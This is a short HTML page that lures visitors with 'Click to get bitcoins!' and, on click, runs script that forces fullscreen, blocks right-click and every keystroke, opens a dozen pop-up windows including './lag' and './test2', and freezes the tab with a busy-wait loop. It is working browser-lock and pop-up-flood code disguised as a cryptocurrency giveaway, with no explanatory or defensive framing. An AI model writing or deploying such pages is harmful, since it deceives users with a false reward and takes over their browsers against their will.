<body oncontextmenu="return false;">
  
<script>
    document.documentElement.requestFullscreen();
    document.onkeydown = function (e) {
        return false;
    }
  
    function sleep(milliseconds) {
    const date = Date.now();
    let currentDate = null;
    do {
      currentDate = Date.now();
    } while (currentDate - date < milliseconds);
  } 
  
  function hh() {
    document.documentElement.requestFullscreen();
    first = window.open()
    var win = window.open("./lag")
    window.open("./test2")&window.open("./test2")&window.open("./test2")&window.open("./test2")&window.open("./test2")&window.open("./test2")&window.open("./test2")&window.open("./test2")&window.open("./test2")&window.open("./test2")

    
    if (win == null) {
      first.close()
      sleep(2000)
      alert("Please allow pop-ups!")
    }
  }
</script>
Click to get bitcoins!<a href="javascript:hh()">(this will open in a new tab, only works for google chrome)</a>

